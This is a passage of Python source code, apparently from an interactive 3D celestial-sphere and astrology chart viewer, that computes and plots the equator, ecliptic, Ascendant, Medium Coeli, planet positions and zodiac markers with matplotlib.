np.pi/2\r\n v_rot1 = self.Rodrigues_rotation(v,k,rotation)\r\n self.poleS=v_rot1\r\n v_rot2=-v_rot1\r\n self.poleN=v_rot2\r\n\r\n self.poleN_id.set_data_3d(*self.poleN)\r\n self.ids[id(self.poleN_id)] =[self.poleN,\"North Pole\"]\r\n\r\n self.poleS_id.set_data_3d(*self.poleS)\r\n self.ids[id(self.poleS_id)] =[self.poleS,\"South Pole\"]\r\n poleN_θ_hor=np.arccos(self.poleN[2])\r\n self.poleN_elev=np.degrees(poleN_θ_hor) \r\n\r\n #====== Ecliptic \r\n\r\n φ1 = -ARMC - np.pi/2\r\n x13, y13, z13 = self.circl_vect(self.equator_rot,k,φ1)\r\n self.v_rot4=[x13,y13,z13]\r\n \r\n k1=np.array(self.v_equinox) \r\n v1=np.array(self.v_rot4)\r\n ε=np.radians(self.ε)\r\n rotation = ε\r\n v_rot3 = self.Rodrigues_rotation(v1,k1,rotation)\r\n self.ecliptic_rot=v_rot3\r\n v2= -self.ecliptic_rot\r\n\r\n φ4=np.arctan(-k1[2]/v2[2])\r\n x3t= v2[0] * np.sin(φ4) + k1[0] * np.cos(φ4)\r\n if 
x3t<0:\r\n φ4 = φ4 + np.pi\r\n\r\n φ4=norm_r(φ4)\r\n self.asc_lon=φ4\r\n\r\n φ3 = np.arctan(-v2[0]/k1[0]) if k1[0] != 0 else np.pi/2\r\n\r\n if norm_r(ARMC)< np.pi:\r\n φ3=np.pi/2 - φ3\r\n ecl_st=0 + φ3 #ecl_start\r\n else:\r\n φ3= - np.pi/2 - φ3\r\n ecl_st=0 + φ3\r\n\r\n self.ecl_start=np.degrees(φ3)\r\n φ_1 = np.linspace(ecl_st , ecl_st + np.pi, 50)\r\n x3, y3, z3 = self.circl_vect(k1, v2, φ_1)\r\n self.ecl_circl_1.set_data_3d(x3, y3, z3)\r\n φ_2 = np.linspace(ecl_st + np.pi, ecl_st + 2*np.pi, 50)\r\n x3, y3, z3 = self.circl_vect(k1, v2, φ_2)\r\n self.ecl_circl_2.set_data_3d(x3, y3, z3)\r\n\r\n\r\n #====== MC ========\r\n r1=1.07\r\n\r\n x3, y3, z3 = self.circl_vect(k1, v2, φ3, r1)\r\n self.v_MC=self.circl_vect(k1, v2, φ3)\r\n self.mc_id.set_data_3d(x3, y3, z3)\r\n\r\n x3, y3, z3 = self.circl_vect(k1, v2, φ3)\r\n lon_=f'Medium Coeli: lon={round(self.planets_data[\"MC\"][\"ecl\"][0],2)}°'\r\n self.ids[id(self.mc_id)] =[[x3, y3, z3],lon_]\r\n\r\n #====== Asc ========\r\n r1=1.07\r\n\r\n x3p, y3p, z3p = self.circl_vect(k1, v2, φ4, r1)\r\n asc_t=[x3p,y3p,z3p-0.03]\r\n self.asc_id.set_data_3d(*asc_t)\r\n\r\n\r\n x13, y13, z13 = self.circl_vect(k1, v2, φ4)\r\n asc=[x13,y13,z13]\r\n self.v_asc=asc\r\n self.asc_id2.set_data_3d(x13, y13, z13)\r\n\r\n self.Asc_φ_hor=np.arccos(self.v_asc[0])\r\n if self.v_asc[1]<0: self.Asc_φ_hor = -abs(self.Asc_φ_hor)\r\n self.Asc_φ_hor = norm_r(self.Asc_φ_hor)\r\n \r\n #============= Ecliptic pole \r\n rotation = -np.pi/2\r\n k1=np.array(self.v_equinox) \r\n v1=np.array(self.ecliptic_rot)\r\n v_rot6 = self.Rodrigues_rotation(v1,k1,rotation)\r\n self.poleN_ecl = v_rot6\r\n self.poleS_ecl=-self.poleN_ecl; \r\n self.poleN_ecl_id.set_data_3d(*self.poleN_ecl)\r\n self.poleS_ecl_id.set_data_3d(*self.poleS_ecl)\r\n\r\n poleN_ecl_θ_hor=np.arccos(self.poleN_ecl[2])\r\n pole_ecl_elev= np.pi/2 - poleN_ecl_θ_hor\r\n self.pole_ecl_elev=np.degrees(pole_ecl_elev)\r\n\r\n self.ids[id(self.poleN_ecl_id)] =[self.poleN_ecl,\"Ecliptic North Pole\"]\r\n self.ids[id(self.poleS_ecl_id)] =[self.poleS_ecl,\"Ecliptic South Pole\"]\r\n \r\n self.plot_ecliptic_scale()\r\n self.plot_equator_scale()\r\n\r\n\r\n def plot_meridian(self): \r\n color_=\"#666666\" \r\n alpha_main=self.alpha_main\r\n θ=self.ψ\r\n y2=np.sin(θ)\r\n z2=np.cos(θ)\r\n x2=np.zeros(np.size(y2))\r\n id_,=self.ax.plot(x2,y2,z2 ,color=color_, linestyle = (0, (1, 2,1,3)), alpha=alpha_main, picker=main_circles_picker, zorder=0)\r\n self.ids[id(id_)] =[[x2[6],y2[6],z2[6]],\"Meridian\"]\r\n self.mer_circle=id_\r\n\r\n def plot_next_prev(self, seconds=0, minutes=0, hours=0):\r\n self.clear_ann()\r\n self.id_text_2.set_text(\"\")\r\n tz_=self.data[\"tz\"]\r\n t_obj=add_days(self.timestamp, seconds=seconds, minutes=minutes, hours=hours,tz_=tz_)\r\n date_t= t_obj[\"date_utc\"]; time_t= t_obj[\"time_utc\"]\r\n date_t_loc= t_obj[\"date_loc\"]; time_t_loc= t_obj[\"time_loc\"] \r\n self.timestamp=t_obj[\"timestamp\"]\r\n\r\n self.date_utc = date_t\r\n self.time_utc = time_t\r\n\r\n latitude = float(self.data[\"lat\"])\r\n longitude = float(self.data[\"lon\"])\r\n self.geo_latitude=latitude\r\n self.planets_data = calc_.get_planets_data(self.date_utc, self.time_utc, latitude, longitude)\r\n\r\n self.plot_Equator_Ecliptic_next()\r\n self.plot_zodiac_next()\r\n self.plot_planets_next(self.planets_data)\r\n\r\n time_utc = \" UTC: {}, {} \".format(self.date_utc, self.time_utc)\r\n time_loc = \"{: >10}, {: >8}\".format(date_t_loc, time_t_loc)\r\n time_loc= \"{: ^21}\".format(time_loc)\r\n\r\n self.id_text_time.set_text(time_loc)\r\n 
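# NOTE: this refresh path recomputes the ephemeris for the shifted timestamp and pushes the new coordinates into the already created artists via set_data_3d(), instead of clearing the axes and re-plotting. Minimal usage sketch, assuming an already constructed astro3D instance named plot_ (hypothetical name):\r\n        #     plot_.plot_next_prev(minutes=10)   # step the chart 10 minutes forward\r\n        #     plot_.plot_next_prev(hours=-1)     # step one hour back\r\n        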
self.id_text_time2.set_text(time_utc)\r\n\r\n self.legend_updt()\r\n\r\n\r\n def plot_planets(self, planets_data):\r\n for i, pl in enumerate(planets_data):\r\n if pl not in c.planets.keys():continue\r\n pl_RA=planets_data[pl]['eq'][0]\r\n pl_decl=planets_data[pl]['eq'][1]\r\n lon=planets_data[pl]['ecl'][0]\r\n lat=planets_data[pl]['ecl'][1]\r\n sym = \"$\" + c.planets[pl] + \"$\"\r\n txt=\"{}: RA={:.2f}°, decl={:.2f}°, lon={:.1f}°, lat={:.1f}°\".format(pl, pl_RA, pl_decl, lon, lat)\r\n self.plot_planet_equat(pl_RA ,pl_decl, lon, lat ,rad=False,meridian=False, name=pl,sym=sym, text=txt)\r\n\r\n def plot_planet_equat(self, RA, decl, lon, lat, rad=False, meridian=False, parallel=False, name=\"\",sym =\"\",text=\"\"):\r\n pl_RA=np.radians(RA) if rad==False else RA\r\n pl_decl=np.radians(decl) if rad==False else decl\r\n rotation=pl_RA\r\n φ=self.ψ\r\n θ=self.ψ\r\n k=self.k\r\n k2 = self.poleN;\r\n v2 = self.equator_rot; \r\n \r\n color_pl2=pl_colors[name]\r\n color_pl1=pl_colors[name]\r\n color_dot=\"#1C0367\"\r\n color_dot=color_pl1\r\n\r\n rotation=rotation - self.v_equinox_ang\r\n v_rot5 = self.Rodrigues_rotation(v2,k2,rotation)\r\n\r\n v_mer = self.circl_vect(v_rot5,k2,φ)\r\n style_=(0, (1,4,1,6)) \r\n color_oran=\"#F38600\"\r\n color_yel=\"#FFCD00\"\r\n color_mer_par=color_pl1\r\n style_= (0, (1,3,)) if name in [\"Sun\",\"Moon\",\"Jupiter\"] else style_\r\n alpha_= 0.8 if name in [\"Sun\",\"Moon\",\"Jupiter\"] else 0.6 #fix light color contrast\r\n id_Mer, = self.ax.plot(*v_mer ,color=color_mer_par, linestyle=style_, linewidth=1,alpha=alpha_, picker=2)\r\n if meridian==False:\r\n id_Mer.set_visible(False)\r\n\r\n id_Mer_nat, = self.ax.plot(*v_mer ,color=color_mer_par, linestyle=(0, (2,4,3,4)), linewidth=1,alpha=alpha_, picker=2)\r\n id_Mer_nat.set_visible(False)\r\n \r\n shift=np.sin(pl_decl)\r\n data=self.plot_parallel(shift,color_=color_mer_par, style_=style_, alpha=alpha_) \r\n id_Par=data[0]\r\n if parallel==False:\r\n id_Par.set_visible(False)\r\n\r\n φ2 = pl_RA - self.v_equinox_ang\r\n φ2=norm_r(φ2)\r\n pl_φ_eq=φ2\r\n v_RA = self.circl_vect(self.equator_rot,k,φ2)\r\n\r\n id_pt_Eq, = self.ax.plot(*v_RA, c=color_dot, marker=\"o\", markersize=2, picker=4, zorder=3)\r\n id_pt_Eq.set_visible(False)\r\n\r\n pl_declination=pl_decl\r\n θ2=pl_decl\r\n v_pl = self.circl_vect(v_RA,k2,θ2)\r\n pl_θ_hor=np.arccos(v_pl[2])\r\n\r\n #-- planet dot \r\n if \"Node\" in name:\r\n id_pl, =self.ax.plot(*v_pl, c=color_pl1, marker=\"o\", picker=5, markersize=2,zorder=6) #onpick\r\n else:\r\n id_pl, =self.ax.plot(*v_pl, c=color_pl1, marker=\"o\", picker=5, markersize=4,zorder=6) #onpick\r\n\r\n arr=[-0.05,0.05]\r\n shift=0.07\r\n v_pl_t=np.add(v_pl,shift)\r\n\r\n if \"Node\" in name:\r\n id_t =self.ax.text(*v_pl_t,s=sym,fontsize=11,c=color_pl2, label=name, fontweight=800, picker=5,bbox=dict(boxstyle=\"round\",edgecolor=(\"#FFF\"),facecolor=(\"#FFF\"),pad=0.0, alpha=0.0), alpha=1.0, zorder=2)\r\n elif name in [\"Sun\",\"Moon\"]:\r\n id_t =self.ax.text(*v_pl_t,s=sym,fontsize=17,c=color_pl2, label=name, fontweight=800, picker=5,bbox=dict(boxstyle=\"round\",edgecolor=(\"#FFF\"),facecolor=(\"#FFF\"),pad=0.0, alpha=0.0), alpha=1.0, zorder=4)\r\n else:\r\n id_t =self.ax.text(*v_pl_t,s=sym,fontsize=16,c=color_pl2, label=name, fontweight=800, picker=5,bbox=dict(boxstyle=\"round\",edgecolor=(\"#FFF\"),facecolor=(\"#FFF\"),pad=0.0, alpha=0.0), alpha=1.0, zorder=4)\r\n\r\n v_hor=[v_pl[0],v_pl[1],0]\r\n v_hor=v_hor/np.linalg.norm(v_hor) \r\n id_pt_Hor, = self.ax.plot(*v_hor,c=color_dot,marker=\"o\", markersize=2, 
picker=4, zorder=7) \r\n id_pt_Hor.set_visible(False)\r\n\r\n pl_φ_hor = np.arccos(v_hor[0]); \r\n if v_hor[1] < 0:\r\n pl_φ_hor = 2*np.pi - pl_φ_hor\r\n\r\n azimuth = 2*np.pi - pl_φ_hor + np.pi/2\r\n azimuth = norm_r(azimuth)\r\n\r\n pl_θ_hor= np.arccos(v_pl[2])\r\n pl_alt_hor= np.pi/2 - pl_θ_hor\r\n #pl_alt_hor = rd(pl_alt_hor)\r\n\r\n #------ planet's proportionate horizon\r\n #tan(a)/tan(A)=sin(b) # Napier\r\n #np.tan(np.pi/2 - θ_pl)/np.tan(α)=np.sin(np.pi/2 - φ_pl) -> α= np.arctan(np.tan(np.pi/2 - θ_pl)/np.sin(np.pi/2 - φ_pl))\r\n #np.tan(np.pi/2 - θ_proj_hor)/np.tan(α)=np.sin(np.pi/2)\r\n #np.tan(np.pi/2 - θ_proj_hor)=np.tan(α) -> np.pi/2 - θ_proj_hor =α -> θ_proj_hor =np.pi/2 - α\r\n\r\n α = np.arctan(np.tan(np.pi/2 - pl_θ_hor)/np.sin(np.pi/2 - pl_φ_hor)) # α = proportionate horizon's inclination\r\n k=self.k\r\n w=self.w\r\n if v_pl[0]<0: α = α + np.pi\r\n v_rot8 = self.Rodrigues_rotation(k, w, α) \r\n φ2 = self.ψ2\r\n x2,y2,z2 = self.circl_vect(v_rot8, w, φ2)\r\n id_proj_hor,=self.ax.plot(x2,y2,z2 ,color=color_mer_par, linestyle = style_, linewidth=1, alpha=alpha_, picker=1, zorder=1)\r\n id_proj_hor.set_visible(False)\r\n\r\n id_proj_hor_nat,=self.ax.plot(x2,y2,z2 ,color=color_mer_par, linestyle = (0, (2,4,3,4)), linewidth=1, alpha=alpha_, picker=1, zorder=1)\r\n id_proj_hor_nat.set_visible(False)\r\n \r\n k2=np.array(self.v_equinox) \r\n v2= -self.ecliptic_rot \r\n φ2=np.radians(lon) \r\n v_ecl = self.circl_vect(k2,v2,φ2)\r\n id_pt_Ecl, = self.ax.plot(*v_ecl,c=color_dot,marker=\"o\", markersize=2, picker=4, zorder=5);\r\n id_pt_Ecl.set_visible(False)\r\n pl_φ_ecl=lon\r\n\r\n #----- help_lines\r\n color_lin=\"#0D5022\"\r\n\r\n ve_=self.line_vect(v_RA, v_pl)\r\n id_l_eq,=self.ax.plot(*ve_ ,color=color_lin, linestyle = (0, (1,2,1,3)), lw=1, alpha=0.6, picker=1)\r\n id_l_eq.set_visible(False)\r\n \r\n ve_=self.line_vect(v_hor, v_pl)\r\n id_l_ho,=self.ax.plot(*ve_ ,color=color_lin, linestyle = (0, (1,2,1,3)), lw=1, alpha=0.6, picker=1)\r\n id_l_ho.set_visible(False)\r\n\r\n ve_=self.line_vect(v_ecl, v_pl)\r\n id_l_ecl,=self.ax.plot(*ve_ ,color=color_lin, linestyle = (0, (1,2,1,3)), lw=1, alpha=0.6, picker=1)\r\n id_l_ecl.set_visible(False)\r\n\r\n self.planets_obj[id_t]={} \r\n self.planets_obj[id_t][\"id_pl\"]=id_pl\r\n self.planets_obj[id_t][\"id_Mer\"]=id_Mer \r\n self.planets_obj[id_t][\"id_Mer_nat\"]=id_Mer_nat\r\n self.planets_obj[id_t][\"id_Par\"]=id_Par \r\n self.planets_obj[id_t][\"id_proj_hor\"]=id_proj_hor \r\n self.planets_obj[id_t][\"id_proj_hor_nat\"]=id_proj_hor_nat \r\n self.planets_obj[id_t][\"name\"]=name\r\n self.planets_obj[id_t][\"txt\"]=text\r\n\r\n self.planets_obj[id_t][\"id_pt_Eq\"] = (id_pt_Eq, rd(norm_r(pl_φ_eq + self.v_equinox_ang)), v_RA, rd(pl_φ_eq)) \r\n self.planets_obj[id_t][\"id_pt_Hor\"] = (id_pt_Hor, rd(pl_φ_hor), v_hor, rd(azimuth), rd(pl_alt_hor))\r\n self.planets_obj[id_t][\"id_pt_Ecl\"] = (id_pt_Ecl, round(pl_φ_ecl,1), v_ecl)\r\n\r\n self.planets_obj[id_t][\"id_l_eq\"]=id_l_eq\r\n self.planets_obj[id_t][\"id_l_ho\"]=id_l_ho\r\n self.planets_obj[id_t][\"id_l_ecl\"]=id_l_ecl\r\n\r\n self.planets_obj[id_t][\"show_mer_par\"]=0\r\n\r\n \r\n self.planets_ids[name]={}\r\n self.planets_ids[name][\"id_pl\"]=id_pl\r\n self.planets_ids[name][\"id_t\"]=id_t\r\n self.planets_ids[name][\"id_Mer\"]=id_Mer\r\n self.planets_ids[name][\"id_Mer_nat\"]=id_Mer_nat\r\n self.planets_ids[name][\"id_Par\"]=id_Par\r\n self.planets_ids[name][\"id_proj_hor\"]=id_proj_hor \r\n self.planets_ids[name][\"id_proj_hor_nat\"]=id_proj_hor_nat\r\n 
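# Two registries are kept on purpose: planets_obj (filled above) is keyed by the text artist, so onpick can map a clicked label back to its data, while planets_ids below is keyed by planet name, so the *_next refresh methods can update each artist in place.\r\n        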
self.planets_ids[name][\"id_pt_Eq\"]=id_pt_Eq\r\n self.planets_ids[name][\"id_pt_Hor\"]=id_pt_Hor\r\n self.planets_ids[name][\"id_pt_Ecl\"]=id_pt_Ecl\r\n self.planets_ids[name][\"id_l_eq\"]=id_l_eq\r\n self.planets_ids[name][\"id_l_ho\"]=id_l_ho\r\n self.planets_ids[name][\"id_l_ecl\"]=id_l_ecl\r\n\r\n\r\n def plot_planets_next(self, planets_data):\r\n for i, pl in enumerate(planets_data):\r\n if pl not in c.planets.keys():continue\r\n pl_RA=planets_data[pl]['eq'][0]\r\n pl_decl=planets_data[pl]['eq'][1]\r\n lon=planets_data[pl]['ecl'][0]\r\n lat=planets_data[pl]['ecl'][1]\r\n txt=\"{}: RA={:.2f}°, decl={:.2f}°, lon={:.1f}°, lat={:.1f}°\".format(pl, pl_RA, pl_decl, lon, lat)\r\n self.plot_planet_equat_next(pl_RA ,pl_decl, lon, lat ,rad=False,meridian=False, name=pl, text=txt) \r\n\r\n def plot_planet_equat_next(self, RA, decl, lon, lat, rad=False, meridian=False, parallel=False, name=\"\", text=\"\"):\r\n pl_RA=np.radians(RA) if rad==False else RA\r\n pl_decl=np.radians(decl) if rad==False else decl\r\n rotation=pl_RA\r\n φ=self.ψ\r\n θ=self.ψ\r\n k=self.k\r\n j=np.array([0,0,1])\r\n k2 = self.poleN;\r\n v2 = self.equator_rot; \r\n\r\n color_pl2=pl_colors[name]\r\n color_pl1=pl_colors[name]\r\n\r\n rotation=rotation - self.v_equinox_ang\r\n v_rot5 = self.Rodrigues_rotation(v2,k2,rotation)\r\n \r\n v_mer = self.circl_vect(v_rot5,k2,φ)\r\n style_=\"dashed\"\r\n color_=\"#543E17\" \r\n self.planets_ids[name][\"id_Mer\"].set_data_3d(*v_mer)\r\n\r\n shift=np.sin(pl_decl)\r\n data=self.plot_parallel(shift, redraw=False) \r\n id_Par=data[0]\r\n v_par=data[1]\r\n self.planets_ids[name][\"id_Par\"].set_data_3d(*v_par) \r\n\r\n φ2 = pl_RA - self.v_equinox_ang\r\n φ2=norm_r(φ2)\r\n pl_φ_eq=φ2\r\n\r\n v_RA = self.circl_vect(self.equator_rot,k,φ2)\r\n\r\n self.planets_ids[name][\"id_pt_Eq\"].set_data_3d(*v_RA)\r\n \r\n pl_declination=pl_decl\r\n θ2=pl_decl\r\n v_pl = self.circl_vect(v_RA,k2,θ2)\r\n\r\n pl_θ_hor=np.arccos(v_pl[2])\r\n\r\n self.planets_ids[name][\"id_pl\"].set_data_3d(*v_pl) \r\n arr=[-0.05,0.05]\r\n shift=0.07\r\n v_vert=np.cross(v_pl,j)\r\n v_vert=v_vert/np.linalg.norm(v_vert)\r\n v_pl_t=np.add(v_pl,shift)\r\n\r\n self.planets_ids[name][\"id_t\"].set_position_3d(v_pl_t);\r\n\r\n\r\n v_hor=[v_pl[0],v_pl[1],0]\r\n v_hor=v_hor/np.linalg.norm(v_hor) \r\n self.planets_ids[name][\"id_pt_Hor\"].set_data_3d(*v_hor)\r\n\r\n pl_φ_hor= np.arccos(v_hor[0]); \r\n\r\n if v_hor[1] < 0:\r\n pl_φ_hor = 2*np.pi - pl_φ_hor\r\n\r\n azimuth = 2*np.pi - pl_φ_hor + np.pi/2\r\n azimuth = norm_r(azimuth)\r\n\r\n pl_θ_hor= np.arccos(v_pl[2])\r\n pl_alt_hor= np.pi/2 - pl_θ_hor\r\n\r\n α = np.arctan(np.tan(np.pi/2 - pl_θ_hor)/np.sin(np.pi/2 - pl_φ_hor)) # α = proportionate horizon's inclination\r\n k=self.k\r\n w=self.w\r\n v_rot8 = self.Rodrigues_rotation(k, w, α)\r\n φ2 = self.ψ2\r\n x2,y2,z2 = self.circl_vect(v_rot8, w, φ2)\r\n self.planets_ids[name][\"id_proj_hor\"].set_data_3d(x2,y2,z2)\r\n\r\n k2=np.array(self.v_equinox) \r\n v2= -self.ecliptic_rot \r\n φ2=np.radians(lon) \r\n v_ecl = self.circl_vect(k2,v2,φ2)\r\n self.planets_ids[name][\"id_pt_Ecl\"].set_data_3d(*v_ecl)\r\n pl_φ_ecl=lon\r\n\r\n #----- help_lines\r\n ve_=self.line_vect(v_RA, v_pl)\r\n self.planets_ids[name][\"id_l_eq\"].set_data_3d(*ve_)\r\n\r\n ve_=self.line_vect(v_hor, v_pl)\r\n self.planets_ids[name][\"id_l_ho\"].set_data_3d(*ve_)\r\n \r\n ve_=self.line_vect(v_ecl, v_pl)\r\n self.planets_ids[name][\"id_l_ecl\"].set_data_3d(*ve_)\r\n\r\n id_l_ecl=0\r\n id_t=self.planets_ids[name][\"id_t\"]\r\n 
id_pt_Eq=self.planets_obj[id_t][\"id_pt_Eq\"][0]\r\n id_pt_Hor=self.planets_obj[id_t][\"id_pt_Hor\"][0]\r\n id_pt_Ecl=self.planets_obj[id_t][\"id_pt_Ecl\"][0]\r\n self.planets_obj[id_t][\"id_pt_Eq\"] = (id_pt_Eq, rd(norm_r(pl_φ_eq + self.v_equinox_ang)), v_RA, rd(pl_φ_eq)) \r\n self.planets_obj[id_t][\"id_pt_Hor\"] = (id_pt_Hor, rd(pl_φ_hor), v_hor, rd(azimuth), rd(pl_alt_hor))\r\n self.planets_obj[id_t][\"id_pt_Ecl\"] = (id_pt_Ecl, round(pl_φ_ecl,1), v_ecl)\r\n self.planets_obj[id_t][\"txt\"]=text\r\n\r\n def plot_zodiac(self): \r\n k2=np.array(self.v_equinox) \r\n v2= -self.ecliptic_rot\r\n ψ=0;i=1\r\n while ψ < 2*np.pi:\r\n v_ = self.circl_vect(k2,v2,ψ)\r\n v_1=np.multiply(v_, 1.01)\r\n v_2=np.multiply(v_, 0.99)\r\n data=np.array([v_1,v_2])\r\n id_1, = self.ax.plot(*v_, c=color_ecl_zod, marker=\"D\", markersize=2, picker=3, zorder=2)\r\n\r\n name=zodiac[i]\r\n sym =zodiac2[i]\r\n self.zodiac_obj[id_1] = (name, sym, v_)\r\n\r\n sym = \"$\" + zodiac2[i] + \"$\"\r\n v_s = self.circl_vect(k2, v2, ψ + np.pi/12)\r\n v_s=np.multiply(v_s, 1.05)\r\n id_2, = self.ax.plot(*v_s, c=\"#4E4C25\", marker=sym, markersize=10, picker=3, zorder=0, alpha=0.2)\r\n self.ecl_ids.append(id_2)\r\n\r\n self.zodiac_ids[i]={}\r\n self.zodiac_ids[i][\"dot\"]=id_1\r\n self.zodiac_ids[i][\"text\"]=id_2\r\n\r\n ψ+=np.pi/6\r\n i+=1\r\n\r\n def plot_zodiac_next(self):\r\n k2=np.array(self.v_equinox) \r\n v2= -self.ecliptic_rot\r\n ψ=0;i=1\r\n while ψ < 2*np.pi:\r\n v_ = self.circl_vect(k2,v2,ψ)\r\n v_1=np.multiply(v_, 1.01)\r\n v_2=np.multiply(v_, 0.99)\r\n data=np.array([v_1,v_2])\r\n self.zodiac_ids[i][\"dot\"].set_data_3d(*v_) \r\n tup=self.zodiac_obj[self.zodiac_ids[i][\"dot\"]] \r\n self.zodiac_obj[self.zodiac_ids[i][\"dot\"]]=(tup[1],tup[0],v_)\r\n v_s = self.circl_vect(k2, v2, ψ + np.pi/12)\r\n v_s=np.multiply(v_s, 1.05)\r\n self.zodiac_ids[i][\"text\"].set_data_3d(*v_s)\r\n \r\n ψ+=np.pi/6\r\n i+=1\r\n\r\n def plot_ecliptic_scale(self): \r\n k2=np.array(self.v_equinox) \r\n v2= -self.ecliptic_rot\r\n ψ=0;i=1\r\n first=True if len(self.ecliptic_scale)==0 else False\r\n while ψ < 360:\r\n v_ = self.circl_vect(k2,v2,np.radians(ψ))\r\n if first:\r\n id_, = self.ax.plot(*v_, c=\"#333\", marker=\"o\", markersize=1)#,zorder=1\r\n id_t=self.ax.text(*v_,s=str(ψ),fontsize=6,c=\"#333\", fontweight=400, picker=5, alpha=self.alpha_main, zorder=0)\r\n self.ecliptic_scale[i]=(id_,id_t)\r\n id_.set_visible(False)\r\n id_t.set_visible(False)\r\n else:\r\n self.ecliptic_scale[i][0].set_data_3d(*v_)\r\n self.ecliptic_scale[i][1].set_position_3d(v_)\r\n ψ+=10\r\n i+=1\r\n\r\n def plot_equator_scale(self): \r\n k2=np.array(self.v_equinox) \r\n v2= -self.ecliptic_rot\r\n ψ=0;i=1\r\n first=True if len(self.equator_scale)==0 else False\r\n while ψ < 360:\r\n φ2 = np.radians(ψ) - self.v_equinox_ang\r\n φ2=norm_r(φ2)\r\n v_ = self.circl_vect(self.equator_rot,self.k,φ2) \r\n if first:\r\n id_, = self.ax.plot(*v_, c=\"#333\", marker=\"o\", markersize=1)#,zorder=1\r\n id_t=self.ax.text(*v_,s=str(ψ),fontsize=6,c=\"#333\", fontweight=400, picker=5, alpha=self.alpha_main, zorder=0)\r\n self.equator_scale[i]=(id_,id_t)\r\n id_.set_visible(False)\r\n id_t.set_visible(False)\r\n else:\r\n self.equator_scale[i][0].set_data_3d(*v_)\r\n self.equator_scale[i][1].set_position_3d(v_)\r\n ψ+=10\r\n i+=1\r\n\r\n\r\n def plot_circle_scale(self, circle):\r\n k2=np.array([1,0,0])\r\n v2=np.array([0,1,0])\r\n if circle==\"Horizon\":\r\n obj_scale=self.Hor_scale={}\r\n k2=np.array([1,0,0])\r\n v2=np.array([0,1,0])\r\n elif circle==\"Prime vertical\":\r\n 
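# Each scale is a ring of tick dots plus degree labels on the great circle spanned by k2 and v2: circl_vect parameterises it as r(φ) = v2*sin(φ) + k2*cos(φ), so the Horizon branch uses the xy-plane basis (1,0,0),(0,1,0) and this branch the xz-plane basis (1,0,0),(0,0,1).\r\n            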
obj_scale=self.PV_scale={}\r\n k2=np.array([1,0,0])\r\n v2=np.array([0,0,1])\r\n\r\n ψ=0;i=1\r\n while ψ < 360:\r\n v_ = self.circl_vect(k2,v2,np.radians(ψ)) \r\n id_, = self.ax.plot(*v_, c=\"#333\", marker=\"o\", markersize=1)\r\n id_t=self.ax.text(*v_,s=str(ψ),fontsize=6,c=\"#333\", fontweight=400, picker=5, alpha=self.alpha_main, zorder=0)\r\n obj_scale[i]=(id_,id_t)\r\n id_.set_visible(False)\r\n id_t.set_visible(False)\r\n ψ+=10\r\n i+=1\r\n\r\n def draw_projected_horizon(self,rotation=np.pi/6, color_=\"#2D305C\", linestyle_=\"dashed\"):\r\n k=self.k\r\n w=np.array([0, -1, 0])\r\n v_rot6 = self.Rodrigues_rotation(k,w,rotation)\r\n φ2 = self.ψ2\r\n x2= w[0] * np.sin(φ2) + v_rot6[0] * np.cos(φ2)\r\n y2= w[1] * np.sin(φ2) + v_rot6[1] * np.cos(φ2)\r\n z2= w[2] * np.sin(φ2) + v_rot6[2] * np.cos(φ2)\r\n id_,=self.ax.plot(x2,y2,z2 ,color=color_, linestyle = linestyle_, linewidth=1)\r\n self.ids[id(id_)] =[[x2[3],y2[3],z2[0]],\"proportionate horizon\"] \r\n self.proj_horizons.append(id_)\r\n return id_\r\n\r\n def plot_parallel(self,shift,color_=\"#CABF6B\", alpha=1,style_=(0, (1, 3)), redraw=True):\r\n frac_poleN=np.multiply(shift,self.poleN) \r\n o_=[0,0,0]; o_shift=np.add(o_,frac_poleN)\r\n c=o_shift\r\n r=shiftx=np.sqrt(1-np.square(shift))\r\n v_rot_shift=self.equator_rot; k_shift=self.k\r\n v_rot_shift= np.multiply(r,v_rot_shift); k_shift= np.multiply(r,k_shift); \r\n v = k_shift ; w = v_rot_shift\r\n φ = self.ψ\r\n x =c[0] + v[0]*np.cos(φ) + w[0]*np.sin(φ)\r\n y =c[1] + v[1]*np.cos(φ) + w[1]*np.sin(φ)\r\n z =c[2] + v[2]*np.cos(φ) + w[2]*np.sin(φ)\r\n if redraw==True:\r\n circle_id, =self.ax.plot(x,y,z ,color=color_, linestyle = style_ , alpha=alpha, picker=2, lw=1)\r\n return (circle_id,[x,y,z]) \r\n else:\r\n return (None,[x,y,z])\r\n\r\n def draw_sphere(self):\r\n φ = np.linspace(0, 2 * np.pi, 100)\r\n θ = np.linspace(0, np.pi, 100)\r\n x = 1 * np.outer(np.cos(φ), np.sin(θ))\r\n y = 1 * np.outer(np.sin(φ), np.sin(θ))\r\n z = 1 * np.outer(np.ones(np.size(φ)), np.cos(θ))\r\n col_viol=\"#EFE9FF\"\r\n col_yel=\"#E9E4D1\"\r\n self.sph_alf=0.3\r\n id_ = self.ax.plot_surface(x, y, z, rstride=4, cstride=4, color=col_yel, linewidth=0, alpha=self.sph_alf)\r\n self.sphere_ = id_\r\n\r\n def draw_surface1(self):\r\n col_viol=\"#EFE9FF\"\r\n col_yel=\"#E9E4D1\"\r\n col_='#333'\r\n self.surface = Circle((0., 0.), 1, color=col_yel,alpha=0.3)\r\n self.ax.add_patch( self.surface)\r\n art3d.pathpatch_2d_to_3d( self.surface, z=0, zdir=\"z\")\r\n\r\n def draw_surface(self):\r\n col_yel1=\"#E9E4D1\"\r\n col_yel2=\"#D0CAB2\"\r\n \r\n angle=90\r\n theta1, theta2 = angle, angle + 180\r\n\r\n self.surface1 = Wedge((0., 0.), 1, theta1, theta2, fc=col_yel2,alpha=0.3)\r\n self.surface2 = Wedge((0., 0.), 1, theta2, theta1, fc=col_yel1,alpha=0.3)\r\n self.ax.add_patch(self.surface1)\r\n self.ax.add_patch(self.surface2)\r\n art3d.pathpatch_2d_to_3d(self.surface1, z=0, zdir=\"z\")\r\n art3d.pathpatch_2d_to_3d(self.surface2, z=0, zdir=\"z\")\r\n\r\n\r\n def new_now(self, planets_data, geo_latitude, data):\r\n self.planets_data=planets_data\r\n self.geo_latitude=geo_latitude\r\n self.data=data\r\n self.timestampIni = self.data[\"timestamp\"]\r\n\r\n self.plot_Equator_Ecliptic_next()\r\n self.plot_zodiac_next()\r\n self.plot_planets_next(self.planets_data)\r\n\r\n ARMC=self.planets_data[\"MC\"][\"eq\"][0]\r\n self.date_utc = self.data[\"d_utc\"]\r\n self.time_utc = self.data[\"t_utc\"]\r\n self.timestamp = self.data[\"timestamp\"]\r\n self.geo_longitude=float(self.data[\"lon\"])\r\n\r\n s1 = \"S\" if 
